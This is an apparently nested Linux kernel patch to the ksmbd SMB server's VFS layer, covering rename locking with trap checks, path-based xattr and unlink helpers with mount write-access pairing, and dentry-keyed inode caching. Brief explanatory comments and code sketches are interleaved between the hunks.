+-	char *dst_name;
+-	int err;
++	if ((flags & RENAME_NOREPLACE) && d_is_positive(new_dentry)) {
++		err = -EEXIST;
++		goto out4;
++	}
+ 
+-	dst_name = extract_last_component(newname);
+-	if (!dst_name) {
+-		dst_name = newname;
+-		newname = "";
++	if (old_child == trap) {
++		err = -EINVAL;
++		goto out4;
+ 	}
+ 
+-	src_dent_parent = dget_parent(fp->filp->f_path.dentry);
+-	src_dent = fp->filp->f_path.dentry;
++	if (new_dentry == trap) {
++		err = -ENOTEMPTY;
++		goto out4;
++	}
++
++	rd.old_mnt_userns	= mnt_user_ns(old_path->mnt),
++	rd.old_dir		= d_inode(old_parent),
++	rd.old_dentry		= old_child,
++	rd.new_mnt_userns	= mnt_user_ns(new_path.mnt),
++	rd.new_dir		= new_path.dentry->d_inode,
++	rd.new_dentry		= new_dentry,
++	rd.flags		= flags,
++	rd.delegated_inode	= NULL,
++	err = vfs_rename(&rd);
++	if (err)
++		ksmbd_debug(VFS, "vfs_rename failed err %d\n", err);
+ 
+-	err = ksmbd_vfs_kern_path(work, newname,
+-				  LOOKUP_NO_SYMLINKS | LOOKUP_DIRECTORY,
+-				  &dst_path, false);
+-	if (err) {
+-		ksmbd_debug(VFS, "Cannot get path for %s [%d]\n", newname, err);
+-		goto out;
++out4:
++	dput(new_dentry);
++out3:
++	dput(old_parent);
++	unlock_rename(old_parent, new_path.dentry);
++	mnt_drop_write(old_path->mnt);
++out2:
++	path_put(&new_path);
++
++	if (retry_estale(err, lookup_flags)) {
++		lookup_flags |= LOOKUP_REVAL;
++		goto retry;
+ 	}
+-	dst_dent_parent = dst_path.dentry;
+-
+-	trap_dent = lock_rename(src_dent_parent, dst_dent_parent);
+-	dget(src_dent);
+-	dget(dst_dent_parent);
+-	user_ns = file_mnt_user_ns(fp->filp);
+-	src_child = lookup_one(user_ns, src_dent->d_name.name, src_dent_parent,
+-			       src_dent->d_name.len);
+-	if (IS_ERR(src_child)) {
+-		err = PTR_ERR(src_child);
+-		goto out_lock;
+-	}
+-
+-	if (src_child != src_dent) {
+-		err = -ESTALE;
+-		dput(src_child);
+-		goto out_lock;
+-	}
+-	dput(src_child);
+-
+-	err = __ksmbd_vfs_rename(work,
+-				 user_ns,
+-				 src_dent_parent,
+-				 src_dent,
+-				 mnt_user_ns(dst_path.mnt),
+-				 dst_dent_parent,
+-				 trap_dent,
+-				 dst_name);
+-out_lock:
+-	dput(src_dent);
+-	dput(dst_dent_parent);
+-	unlock_rename(src_dent_parent, dst_dent_parent);
+-	path_put(&dst_path);
+-out:
+-	dput(src_dent_parent);
++out1:
++	putname(to);
++revert_fsids:
++	ksmbd_revert_fsids(work);
+ 	return err;
+ }
+ 
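The rewritten rename path adopts the same locking protocol as do_renameat2(): lock_rename_child() locks the source's parent and the destination directory in a deadlock-safe order starting from the child dentry, and returns the "trap" dentry, the common ancestor a rename must never cross. That is what the two trap comparisons above enforce, sketched here:

/* trap protocol (mirrors fs/namei.c):
 *   trap = lock_rename_child(old_child, new_dir);
 *   old_child == trap   -> -EINVAL    (moving a directory into itself)
 *   new_dentry == trap  -> -ENOTEMPTY (target is an ancestor of the source)
 *   otherwise: vfs_rename(&rd); unlock_rename(old_parent, new_dir);
 */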
+@@ -892,7 +852,7 @@ ssize_t ksmbd_vfs_listxattr(struct dentry *dentry, char **list)
+ 	if (size <= 0)
+ 		return size;
+ 
+-	vlist = kvmalloc(size, GFP_KERNEL | __GFP_ZERO);
++	vlist = kvzalloc(size, GFP_KERNEL);
+ 	if (!vlist)
+ 		return -ENOMEM;
+ 
+@@ -950,28 +910,38 @@ ssize_t ksmbd_vfs_getxattr(struct user_namespace *user_ns,
+ /**
+  * ksmbd_vfs_setxattr() - vfs helper for smb set extended attributes value
+  * @user_ns:	user namespace
+- * @dentry:	dentry to set XATTR at
+- * @name:	xattr name for setxattr
+- * @value:	xattr value to set
+- * @size:	size of xattr value
++ * @path:	path of dentry to set XATTR at
++ * @attr_name:	xattr name for setxattr
++ * @attr_value:	xattr value to set
++ * @attr_size:	size of xattr value
+  * @flags:	destination buffer length
++ * @get_write:	get write access to a mount
+  *
+  * Return:	0 on success, otherwise error
+  */
+ int ksmbd_vfs_setxattr(struct user_namespace *user_ns,
+-		       struct dentry *dentry, const char *attr_name,
+-		       void *attr_value, size_t attr_size, int flags)
++		       const struct path *path, const char *attr_name,
++		       void *attr_value, size_t attr_size, int flags,
++		       bool get_write)
+ {
+ 	int err;
+ 
++	if (get_write == true) {
++		err = mnt_want_write(path->mnt);
++		if (err)
++			return err;
++	}
++
+ 	err = vfs_setxattr(user_ns,
+-			   dentry,
++			   path->dentry,
+ 			   attr_name,
+ 			   attr_value,
+ 			   attr_size,
+ 			   flags);
+ 	if (err)
+ 		ksmbd_debug(VFS, "setxattr failed, err %d\n", err);
++	if (get_write == true)
++		mnt_drop_write(path->mnt);
+ 	return err;
+ }
+ 
+@@ -1075,19 +1045,34 @@ int ksmbd_vfs_fqar_lseek(struct ksmbd_file *fp, loff_t start, loff_t length,
+ }
+ 
+ int ksmbd_vfs_remove_xattr(struct user_namespace *user_ns,
+-			   struct dentry *dentry, char *attr_name)
++			   const struct path *path, char *attr_name)
+ {
+-	return vfs_removexattr(user_ns, dentry, attr_name);
++	int err;
++
++	err = mnt_want_write(path->mnt);
++	if (err)
++		return err;
++
++	err = vfs_removexattr(user_ns, path->dentry, attr_name);
++	mnt_drop_write(path->mnt);
++
++	return err;
+ }
+ 
+-int ksmbd_vfs_unlink(struct user_namespace *user_ns,
+-		     struct dentry *dir, struct dentry *dentry)
++int ksmbd_vfs_unlink(struct file *filp)
+ {
+ 	int err = 0;
++	struct dentry *dir, *dentry = filp->f_path.dentry;
++	struct user_namespace *user_ns = file_mnt_user_ns(filp);
+ 
+-	err = ksmbd_vfs_lock_parent(user_ns, dir, dentry);
++	err = mnt_want_write(filp->f_path.mnt);
+ 	if (err)
+ 		return err;
++
++	dir = dget_parent(dentry);
++	err = ksmbd_vfs_lock_parent(dir, dentry);
++	if (err)
++		goto out;
+ 	dget(dentry);
+ 
+ 	if (S_ISDIR(d_inode(dentry)->i_mode))
+@@ -1099,6 +1084,9 @@ int ksmbd_vfs_unlink(struct user_namespace *user_ns,
+ 	inode_unlock(d_inode(dir));
+ 	if (err)
+ 		ksmbd_debug(VFS, "failed to delete, err %d\n", err);
++out:
++	dput(dir);
++	mnt_drop_write(filp->f_path.mnt);
+ 
+ 	return err;
+ }
+@@ -1201,32 +1189,29 @@ static int ksmbd_vfs_lookup_in_dir(const struct path *dir, char *name,
+ }
+ 
+ /**
+- * ksmbd_vfs_kern_path() - lookup a file and get path info
+- * @name:	file path that is relative to share
+- * @flags:	lookup flags
+- * @path:	if lookup succeed, return path info
++ * ksmbd_vfs_kern_path_locked() - lookup a file and get path info
++ * @name:		file path that is relative to share
++ * @flags:		lookup flags
++ * @parent_path:	if lookup succeed, return parent_path info
++ * @path:		if lookup succeed, return path info
+  * @caseless:	caseless filename lookup
+  *
+  * Return:	0 on success, otherwise error
+  */
+-int ksmbd_vfs_kern_path(struct ksmbd_work *work, char *name,
+-			unsigned int flags, struct path *path, bool caseless)
++int ksmbd_vfs_kern_path_locked(struct ksmbd_work *work, char *name,
++			       unsigned int flags, struct path *parent_path,
++			       struct path *path, bool caseless)
+ {
+ 	struct ksmbd_share_config *share_conf = work->tcon->share_conf;
+ 	int err;
+ 
+-	flags |= LOOKUP_BENEATH;
+-	err = vfs_path_lookup(share_conf->vfs_path.dentry,
+-			      share_conf->vfs_path.mnt,
+-			      name,
+-			      flags,
+-			      path);
++	err = ksmbd_vfs_path_lookup_locked(share_conf, name, flags, parent_path,
++					   path);
+ 	if (!err)
+ 		return 0;
+ 
+ 	if (caseless) {
+ 		char *filepath;
+-		struct path parent;
+ 		size_t path_len, remain_len;
+ 
+ 		filepath = kstrdup(name, GFP_KERNEL);
+@@ -1236,10 +1221,10 @@ int ksmbd_vfs_kern_path(struct ksmbd_work *work, char *name,
+ 		path_len = strlen(filepath);
+ 		remain_len = path_len;
+ 
+-		parent = share_conf->vfs_path;
+-		path_get(&parent);
++		*parent_path = share_conf->vfs_path;
++		path_get(parent_path);
+ 
+-		while (d_can_lookup(parent.dentry)) {
++		while (d_can_lookup(parent_path->dentry)) {
+ 			char *filename = filepath + path_len - remain_len;
+ 			char *next = strchrnul(filename, '/');
+ 			size_t filename_len = next - filename;
+@@ -1248,12 +1233,11 @@ int ksmbd_vfs_kern_path(struct ksmbd_work *work, char *name,
+ 			if (filename_len == 0)
+ 				break;
+ 
+-			err = ksmbd_vfs_lookup_in_dir(&parent, filename,
++			err = ksmbd_vfs_lookup_in_dir(parent_path, filename,
+ 						      filename_len,
+ 						      work->conn->um);
+-			path_put(&parent);
+ 			if (err)
+-				goto out;
++				goto out2;
+ 
+ 			next[0] = '\0';
+ 
+@@ -1261,26 +1245,50 @@ int ksmbd_vfs_kern_path(struct ksmbd_work *work, char *name,
+ 					      share_conf->vfs_path.mnt,
+ 					      filepath,
+ 					      flags,
+-					      &parent);
++					      path);
+ 			if (err)
+-				goto out;
+-			else if (is_last) {
+-				*path = parent;
+-				goto out;
+-			}
++				goto out2;
++			else if (is_last)
++				goto out1;
++			path_put(parent_path);
++			*parent_path = *path;
+ 
+ 			next[0] = '/';
+ 			remain_len -= filename_len + 1;
+ 		}
+ 
+-		path_put(&parent);
+ 		err = -EINVAL;
+-out:
++out2:
++		path_put(parent_path);
++out1:
+ 		kfree(filepath);
+ 	}
++
++	if (!err) {
++		err = mnt_want_write(parent_path->mnt);
++		if (err) {
++			path_put(path);
++			path_put(parent_path);
++			return err;
++		}
++
++		err = ksmbd_vfs_lock_parent(parent_path->dentry, path->dentry);
++		if (err) {
++			path_put(path);
++			path_put(parent_path);
++		}
++	}
+ 	return err;
+ }
+ 
++void ksmbd_vfs_kern_path_unlock(struct path *parent_path, struct path *path)
++{
++	inode_unlock(d_inode(parent_path->dentry));
++	mnt_drop_write(parent_path->mnt);
++	path_put(path);
++	path_put(parent_path);
++}
++
+ struct dentry *ksmbd_vfs_kern_path_create(struct ksmbd_work *work,
+ 					  const char *name,
+ 					  unsigned int flags,
+@@ -1299,13 +1307,13 @@ struct dentry *ksmbd_vfs_kern_path_create(struct ksmbd_work *work,
+ }
+ 
+ int ksmbd_vfs_remove_acl_xattrs(struct user_namespace *user_ns,
+-				struct dentry *dentry)
++				const struct path *path)
+ {
+ 	char *name, *xattr_list = NULL;
+ 	ssize_t xattr_list_len;
+ 	int err = 0;
+ 
+-	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
++	xattr_list_len = ksmbd_vfs_listxattr(path->dentry, &xattr_list);
+ 	if (xattr_list_len < 0) {
+ 		goto out;
+ 	} else if (!xattr_list_len) {
+@@ -1321,25 +1329,25 @@ int ksmbd_vfs_remove_acl_xattrs(struct user_namespace *user_ns,
+ 			     sizeof(XATTR_NAME_POSIX_ACL_ACCESS) - 1) ||
+ 		    !strncmp(name, XATTR_NAME_POSIX_ACL_DEFAULT,
+ 			     sizeof(XATTR_NAME_POSIX_ACL_DEFAULT) - 1)) {
+-			err = ksmbd_vfs_remove_xattr(user_ns, dentry, name);
++			err = ksmbd_vfs_remove_xattr(user_ns, path, name);
+ 			if (err)
+ 				ksmbd_debug(SMB,
+ 					    "remove acl xattr failed : %s\n", name);
+ 		}
+ 	}
++
+ out:
+ 	kvfree(xattr_list);
+ 	return err;
+ }
+ 
+-int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns,
+-			       struct dentry *dentry)
++int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns, const struct path *path)
+ {
+ 	char *name, *xattr_list = NULL;
+ 	ssize_t xattr_list_len;
+ 	int err = 0;
+ 
+-	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
++	xattr_list_len = ksmbd_vfs_listxattr(path->dentry, &xattr_list);
+ 	if (xattr_list_len < 0) {
+ 		goto out;
+ 	} else if (!xattr_list_len) {
+@@ -1352,7 +1360,7 @@ int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns,
+ 		ksmbd_debug(SMB, "%s, len %zd\n", name, strlen(name));
+ 
+ 		if (!strncmp(name, XATTR_NAME_SD, XATTR_NAME_SD_LEN)) {
+-			err = ksmbd_vfs_remove_xattr(user_ns, dentry, name);
++			err = ksmbd_vfs_remove_xattr(user_ns, path, name);
+ 			if (err)
+ 				ksmbd_debug(SMB, "remove xattr failed : %s\n", name);
+ 		}
+@@ -1376,7 +1384,7 @@ static struct xattr_smb_acl *ksmbd_vfs_make_xattr_posix_acl(struct user_namespac
+ 		return NULL;
+ 
+ 	posix_acls = get_acl(inode, acl_type);
+-	if (!posix_acls)
++	if (IS_ERR_OR_NULL(posix_acls))
+ 		return NULL;
+ 
+ 	smb_acl = kzalloc(sizeof(struct xattr_smb_acl) +
+@@ -1429,13 +1437,15 @@ out:
+ 
+ int ksmbd_vfs_set_sd_xattr(struct ksmbd_conn *conn,
+ 			   struct user_namespace *user_ns,
+-			   struct dentry *dentry,
+-			   struct smb_ntsd *pntsd, int len)
++			   const struct path *path,
++			   struct smb_ntsd *pntsd, int len,
++			   bool get_write)
+ {
+ 	int rc;
+ 	struct ndr sd_ndr = {0}, acl_ndr = {0};
+ 	struct xattr_ntacl acl = {0};
+ 	struct xattr_smb_acl *smb_acl, *def_smb_acl = NULL;
++	struct dentry *dentry = path->dentry;
+ 	struct inode *inode = d_inode(dentry);
+ 
+ 	acl.version = 4;
+@@ -1487,9 +1497,9 @@ int ksmbd_vfs_set_sd_xattr(struct ksmbd_conn *conn,
+ 		goto out;
+ 	}
+ 
+-	rc = ksmbd_vfs_setxattr(user_ns, dentry,
++	rc = ksmbd_vfs_setxattr(user_ns, path,
+ 				XATTR_NAME_SD, sd_ndr.data,
+-				sd_ndr.offset, 0);
++				sd_ndr.offset, 0, get_write);
+ 	if (rc < 0)
+ 		pr_err("Failed to store XATTR ntacl :%d\n", rc);
+ 
+@@ -1577,8 +1587,9 @@ free_n_data:
+ }
+ 
+ int ksmbd_vfs_set_dos_attrib_xattr(struct user_namespace *user_ns,
+-				   struct dentry *dentry,
+-				   struct xattr_dos_attrib *da)
++				   const struct path *path,
++				   struct xattr_dos_attrib *da,
++				   bool get_write)
+ {
+ 	struct ndr n;
+ 	int err;
+@@ -1587,8 +1598,8 @@ int ksmbd_vfs_set_dos_attrib_xattr(struct user_namespace *user_ns,
+ 	if (err)
+ 		return err;
+ 
+-	err = ksmbd_vfs_setxattr(user_ns, dentry, XATTR_NAME_DOS_ATTRIBUTE,
+-				 (void *)n.data, n.offset, 0);
++	err = ksmbd_vfs_setxattr(user_ns, path, XATTR_NAME_DOS_ATTRIBUTE,
++				 (void *)n.data, n.offset, 0, get_write);
+ 	if (err)
+ 		ksmbd_debug(SMB, "failed to store dos attribute in xattr\n");
+ 	kfree(n.data);
+@@ -1824,10 +1835,11 @@ void ksmbd_vfs_posix_lock_unblock(struct file_lock *flock)
+ }
+ 
+ int ksmbd_vfs_set_init_posix_acl(struct user_namespace *user_ns,
+-				 struct inode *inode)
++				 struct path *path)
+ {
+ 	struct posix_acl_state acl_state;
+ 	struct posix_acl *acls;
++	struct inode *inode = d_inode(path->dentry);
+ 	int rc;
+ 
+ 	if (!IS_ENABLED(CONFIG_FS_POSIX_ACL))
+@@ -1856,6 +1868,7 @@ int ksmbd_vfs_set_init_posix_acl(struct user_namespace *user_ns,
+ 		return -ENOMEM;
+ 	}
+ 	posix_state_to_acl(&acl_state, acls->a_entries);
++
+ 	rc = set_posix_acl(user_ns, inode, ACL_TYPE_ACCESS, acls);
+ 	if (rc < 0)
+ 		ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_ACCESS) failed, rc : %d\n",
+@@ -1868,23 +1881,25 @@ int ksmbd_vfs_set_init_posix_acl(struct user_namespace *user_ns,
+ 			ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_DEFAULT) failed, rc : %d\n",
+ 				    rc);
+ 	}
++
+ 	free_acl_state(&acl_state);
+ 	posix_acl_release(acls);
+ 	return rc;
+ }
+ 
+ int ksmbd_vfs_inherit_posix_acl(struct user_namespace *user_ns,
+-				struct inode *inode, struct inode *parent_inode)
++				struct path *path, struct inode *parent_inode)
+ {
+ 	struct posix_acl *acls;
+ 	struct posix_acl_entry *pace;
++	struct inode *inode = d_inode(path->dentry);
+ 	int rc, i;
+ 
+ 	if (!IS_ENABLED(CONFIG_FS_POSIX_ACL))
+ 		return -EOPNOTSUPP;
+ 
+ 	acls = get_acl(parent_inode, ACL_TYPE_DEFAULT);
+-	if (!acls)
++	if (IS_ERR_OR_NULL(acls))
+ 		return -ENOENT;
+ 	pace = acls->a_entries;
+ 
+@@ -1906,6 +1921,7 @@ int ksmbd_vfs_inherit_posix_acl(struct user_namespace *user_ns,
+ 			ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_DEFAULT) failed, rc : %d\n",
+ 				    rc);
+ 	}
++
+ 	posix_acl_release(acls);
+ 	return rc;
+ }
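A recurring pattern in the vfs.c changes: every helper that writes through the mount now brackets the operation with mnt_want_write()/mnt_drop_write(), and the setxattr-style helpers grew a get_write flag so that callers already holding write access (for instance via ksmbd_vfs_kern_path_locked(), which takes it before locking the parent) can pass false and avoid re-acquiring it. Usage sketch, with hypothetical attribute names and lengths:

/* batch two xattr writes under a single write-access grab */
err = mnt_want_write(path->mnt);
if (err)
        return err;

err = ksmbd_vfs_setxattr(user_ns, path, name1, val1, len1, 0, false);
if (!err)
        err = ksmbd_vfs_setxattr(user_ns, path, name2, val2, len2, 0, false);

mnt_drop_write(path->mnt);      /* always paired, even on error */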
+diff --git a/fs/smb/server/vfs.h b/fs/smb/server/vfs.h
+index 593059ca85112..e761dde2443e2 100644
+--- a/fs/smb/server/vfs.h
++++ b/fs/smb/server/vfs.h
+@@ -71,25 +71,23 @@ struct ksmbd_kstat {
+ 	__le32			file_attributes;
+ };
+ 
+-int ksmbd_vfs_lock_parent(struct user_namespace *user_ns, struct dentry *parent,
+-			  struct dentry *child);
+-int ksmbd_vfs_may_delete(struct user_namespace *user_ns, struct dentry *dentry);
+-int ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
++int ksmbd_vfs_lock_parent(struct dentry *parent, struct dentry *child);
++void ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
+ 				   struct dentry *dentry, __le32 *daccess);
+ int ksmbd_vfs_create(struct ksmbd_work *work, const char *name, umode_t mode);
+ int ksmbd_vfs_mkdir(struct ksmbd_work *work, const char *name, umode_t mode);
+-int ksmbd_vfs_read(struct ksmbd_work *work, struct ksmbd_file *fp,
+-		   size_t count, loff_t *pos);
++int ksmbd_vfs_read(struct ksmbd_work *work, struct ksmbd_file *fp, size_t count,
++		   loff_t *pos, char *rbuf);
+ int ksmbd_vfs_write(struct ksmbd_work *work, struct ksmbd_file *fp,
+ 		    char *buf, size_t count, loff_t *pos, bool sync,
+ 		    ssize_t *written);
+ int ksmbd_vfs_fsync(struct ksmbd_work *work, u64 fid, u64 p_id);
+-int ksmbd_vfs_remove_file(struct ksmbd_work *work, char *name);
++int ksmbd_vfs_remove_file(struct ksmbd_work *work, const struct path *path);
+ int ksmbd_vfs_link(struct ksmbd_work *work,
+ 		   const char *oldname, const char *newname);
+ int ksmbd_vfs_getattr(const struct path *path, struct kstat *stat);
+-int ksmbd_vfs_fp_rename(struct ksmbd_work *work, struct ksmbd_file *fp,
+-			char *newname);
++int ksmbd_vfs_rename(struct ksmbd_work *work, const struct path *old_path,
++		     char *newname, int flags);
+ int ksmbd_vfs_truncate(struct ksmbd_work *work,
+ 		       struct ksmbd_file *fp, loff_t size);
+ struct srv_copychunk;
+@@ -110,15 +108,17 @@ ssize_t ksmbd_vfs_casexattr_len(struct user_namespace *user_ns,
+ 				struct dentry *dentry, char *attr_name,
+ 				int attr_name_len);
+ int ksmbd_vfs_setxattr(struct user_namespace *user_ns,
+-		       struct dentry *dentry, const char *attr_name,
+-		       void *attr_value, size_t attr_size, int flags);
++		       const struct path *path, const char *attr_name,
++		       void *attr_value, size_t attr_size, int flags,
++		       bool get_write);
+ int ksmbd_vfs_xattr_stream_name(char *stream_name, char **xattr_stream_name,
+ 				size_t *xattr_stream_name_size, int s_type);
+ int ksmbd_vfs_remove_xattr(struct user_namespace *user_ns,
+-			   struct dentry *dentry, char *attr_name);
+-int ksmbd_vfs_kern_path(struct ksmbd_work *work,
+-			char *name, unsigned int flags, struct path *path,
+-			bool caseless);
++			   const struct path *path, char *attr_name);
++int ksmbd_vfs_kern_path_locked(struct ksmbd_work *work, char *name,
++			       unsigned int flags, struct path *parent_path,
++			       struct path *path, bool caseless);
++void ksmbd_vfs_kern_path_unlock(struct path *parent_path, struct path *path);
+ struct dentry *ksmbd_vfs_kern_path_create(struct ksmbd_work *work,
+ 					  const char *name,
+ 					  unsigned int flags,
+@@ -131,8 +131,7 @@ struct file_allocated_range_buffer;
+ int ksmbd_vfs_fqar_lseek(struct ksmbd_file *fp, loff_t start, loff_t length,
+ 			 struct file_allocated_range_buffer *ranges,
+ 			 unsigned int in_count, unsigned int *out_count);
+-int ksmbd_vfs_unlink(struct user_namespace *user_ns,
+-		     struct dentry *dir, struct dentry *dentry);
++int ksmbd_vfs_unlink(struct file *filp);
+ void *ksmbd_vfs_init_kstat(char **p, struct ksmbd_kstat *ksmbd_kstat);
+ int ksmbd_vfs_fill_dentry_attrs(struct ksmbd_work *work,
+ 				struct user_namespace *user_ns,
+@@ -142,26 +141,27 @@ void ksmbd_vfs_posix_lock_wait(struct file_lock *flock);
+ int ksmbd_vfs_posix_lock_wait_timeout(struct file_lock *flock, long timeout);
+ void ksmbd_vfs_posix_lock_unblock(struct file_lock *flock);
+ int ksmbd_vfs_remove_acl_xattrs(struct user_namespace *user_ns,
+-				struct dentry *dentry);
+-int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns,
+-			       struct dentry *dentry);
++				const struct path *path);
++int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns, const struct path *path);
+ int ksmbd_vfs_set_sd_xattr(struct ksmbd_conn *conn,
+ 			   struct user_namespace *user_ns,
+-			   struct dentry *dentry,
+-			   struct smb_ntsd *pntsd, int len);
++			   const struct path *path,
++			   struct smb_ntsd *pntsd, int len,
++			   bool get_write);
+ int ksmbd_vfs_get_sd_xattr(struct ksmbd_conn *conn,
+ 			   struct user_namespace *user_ns,
+ 			   struct dentry *dentry,
+ 			   struct smb_ntsd **pntsd);
+ int ksmbd_vfs_set_dos_attrib_xattr(struct user_namespace *user_ns,
+-				   struct dentry *dentry,
+-				   struct xattr_dos_attrib *da);
++				   const struct path *path,
++				   struct xattr_dos_attrib *da,
++				   bool get_write);
+ int ksmbd_vfs_get_dos_attrib_xattr(struct user_namespace *user_ns,
+ 				   struct dentry *dentry,
+ 				   struct xattr_dos_attrib *da);
+ int ksmbd_vfs_set_init_posix_acl(struct user_namespace *user_ns,
+-				 struct inode *inode);
++				 struct path *path);
+ int ksmbd_vfs_inherit_posix_acl(struct user_namespace *user_ns,
+-				struct inode *inode,
++				struct path *path,
+ 				struct inode *parent_inode);
+ #endif /* __KSMBD_VFS_H__ */
+diff --git a/fs/smb/server/vfs_cache.c b/fs/smb/server/vfs_cache.c
+index 6ec6c129465d3..2528ce8aeebbe 100644
+--- a/fs/smb/server/vfs_cache.c
++++ b/fs/smb/server/vfs_cache.c
+@@ -65,14 +65,14 @@ static unsigned long inode_hash(struct super_block *sb, unsigned long hashval)
+ 	return tmp & inode_hash_mask;
+ }
+ 
+-static struct ksmbd_inode *__ksmbd_inode_lookup(struct inode *inode)
++static struct ksmbd_inode *__ksmbd_inode_lookup(struct dentry *de)
+ {
+ 	struct hlist_head *head = inode_hashtable +
+-		inode_hash(inode->i_sb, inode->i_ino);
++		inode_hash(d_inode(de)->i_sb, (unsigned long)de);
+ 	struct ksmbd_inode *ci = NULL, *ret_ci = NULL;
+ 
+ 	hlist_for_each_entry(ci, head, m_hash) {
+-		if (ci->m_inode == inode) {
++		if (ci->m_de == de) {
+ 			if (atomic_inc_not_zero(&ci->m_count))
+ 				ret_ci = ci;
+ 			break;
+@@ -83,26 +83,27 @@ static struct ksmbd_inode *__ksmbd_inode_lookup(struct inode *inode)
+ 
+ static struct ksmbd_inode *ksmbd_inode_lookup(struct ksmbd_file *fp)
+ {
+-	return __ksmbd_inode_lookup(file_inode(fp->filp));
++	return __ksmbd_inode_lookup(fp->filp->f_path.dentry);
+ }
+ 
+-static struct ksmbd_inode *ksmbd_inode_lookup_by_vfsinode(struct inode *inode)
++struct ksmbd_inode *ksmbd_inode_lookup_lock(struct dentry *d)
+ {
+ 	struct ksmbd_inode *ci;
+ 
+ 	read_lock(&inode_hash_lock);
+-	ci = __ksmbd_inode_lookup(inode);
++	ci = __ksmbd_inode_lookup(d);
+ 	read_unlock(&inode_hash_lock);
++
+ 	return ci;
+ }
+ 
+-int ksmbd_query_inode_status(struct inode *inode)
++int ksmbd_query_inode_status(struct dentry *dentry)
+ {
+ 	struct ksmbd_inode *ci;
+ 	int ret = KSMBD_INODE_STATUS_UNKNOWN;
+ 
+ 	read_lock(&inode_hash_lock);
+-	ci = __ksmbd_inode_lookup(inode);
++	ci = __ksmbd_inode_lookup(dentry);
+ 	if (ci) {
+ 		ret = KSMBD_INODE_STATUS_OK;
+ 		if (ci->m_flags & (S_DEL_PENDING | S_DEL_ON_CLS))
+@@ -142,7 +143,7 @@ void ksmbd_fd_set_delete_on_close(struct ksmbd_file *fp,
+ static void ksmbd_inode_hash(struct ksmbd_inode *ci)
+ {
+ 	struct hlist_head *b = inode_hashtable +
+-		inode_hash(ci->m_inode->i_sb, ci->m_inode->i_ino);
++		inode_hash(d_inode(ci->m_de)->i_sb, (unsigned long)ci->m_de);
+ 
+ 	hlist_add_head(&ci->m_hash, b);
+ }
+@@ -156,7 +157,6 @@ static void ksmbd_inode_unhash(struct ksmbd_inode *ci)
+ 
+ static int ksmbd_inode_init(struct ksmbd_inode *ci, struct ksmbd_file *fp)
+ {
+-	ci->m_inode = file_inode(fp->filp);
+ 	atomic_set(&ci->m_count, 1);
+ 	atomic_set(&ci->op_count, 0);
+ 	atomic_set(&ci->sop_count, 0);
+@@ -165,6 +165,7 @@ static int ksmbd_inode_init(struct ksmbd_inode *ci, struct ksmbd_file *fp)
+ 	INIT_LIST_HEAD(&ci->m_fp_list);
+ 	INIT_LIST_HEAD(&ci->m_op_list);
+ 	rwlock_init(&ci->m_lock);
++	ci->m_de = fp->filp->f_path.dentry;
+ 	return 0;
+ }
+ 
+@@ -208,7 +209,7 @@ static void ksmbd_inode_free(struct ksmbd_inode *ci)
+ 	kfree(ci);
+ }
+ 
+-static void ksmbd_inode_put(struct ksmbd_inode *ci)
++void ksmbd_inode_put(struct ksmbd_inode *ci)
+ {
+ 	if (atomic_dec_and_test(&ci->m_count))
+ 		ksmbd_inode_free(ci);
+@@ -243,7 +244,6 @@ void ksmbd_release_inode_hash(void)
+ 
+ static void __ksmbd_inode_close(struct ksmbd_file *fp)
+ {
+-	struct dentry *dir, *dentry;
+ 	struct ksmbd_inode *ci = fp->f_ci;
+ 	int err;
+ 	struct file *filp;
+@@ -252,7 +252,7 @@ static void __ksmbd_inode_close(struct ksmbd_file *fp)
+ 	if (ksmbd_stream_fd(fp) && (ci->m_flags & S_DEL_ON_CLS_STREAM)) {
+ 		ci->m_flags &= ~S_DEL_ON_CLS_STREAM;
+ 		err = ksmbd_vfs_remove_xattr(file_mnt_user_ns(filp),
+-					     filp->f_path.dentry,
++					     &filp->f_path,
+ 					     fp->stream.name);
+ 		if (err)
+ 			pr_err("remove xattr failed : %s\n",
+@@ -262,11 +262,9 @@ static void __ksmbd_inode_close(struct ksmbd_file *fp)
+ 	if (atomic_dec_and_test(&ci->m_count)) {
+ 		write_lock(&ci->m_lock);
+ 		if (ci->m_flags & (S_DEL_ON_CLS | S_DEL_PENDING)) {
+-			dentry = filp->f_path.dentry;
+-			dir = dentry->d_parent;
+ 			ci->m_flags &= ~(S_DEL_ON_CLS | S_DEL_PENDING);
+ 			write_unlock(&ci->m_lock);
+-			ksmbd_vfs_unlink(file_mnt_user_ns(filp), dir, dentry);
++			ksmbd_vfs_unlink(filp);
+ 			write_lock(&ci->m_lock);
+ 		}
+ 		write_unlock(&ci->m_lock);
+@@ -335,6 +333,9 @@ static void __ksmbd_close_fd(struct ksmbd_file_table *ft, struct ksmbd_file *fp)
+ 
+ static struct ksmbd_file *ksmbd_fp_get(struct ksmbd_file *fp)
+ {
++	if (fp->f_state != FP_INITED)
++		return NULL;
++
+ 	if (!atomic_inc_not_zero(&fp->refcount))
+ 		return NULL;
+ 	return fp;
+@@ -384,15 +385,20 @@ int ksmbd_close_fd(struct ksmbd_work *work, u64 id)
+ 		return 0;
+ 
+ 	ft = &work->sess->file_table;
+-	read_lock(&ft->lock);
++	write_lock(&ft->lock);
+ 	fp = idr_find(ft->idr, id);
+ 	if (fp) {
+ 		set_close_state_blocked_works(fp);
+ 
+-		if (!atomic_dec_and_test(&fp->refcount))
++		if (fp->f_state != FP_INITED)
+ 			fp = NULL;
++		else {
++			fp->f_state = FP_CLOSED;
++			if (!atomic_dec_and_test(&fp->refcount))
++				fp = NULL;
++		}
+ 	}
+-	read_unlock(&ft->lock);
++	write_unlock(&ft->lock);
+ 
+ 	if (!fp)
+ 		return -EINVAL;
+@@ -482,12 +488,15 @@ struct ksmbd_file *ksmbd_lookup_fd_cguid(char *cguid)
+ 	return fp;
+ }
+ 
+-struct ksmbd_file *ksmbd_lookup_fd_inode(struct inode *inode)
++struct ksmbd_file *ksmbd_lookup_fd_inode(struct dentry *dentry)
+ {
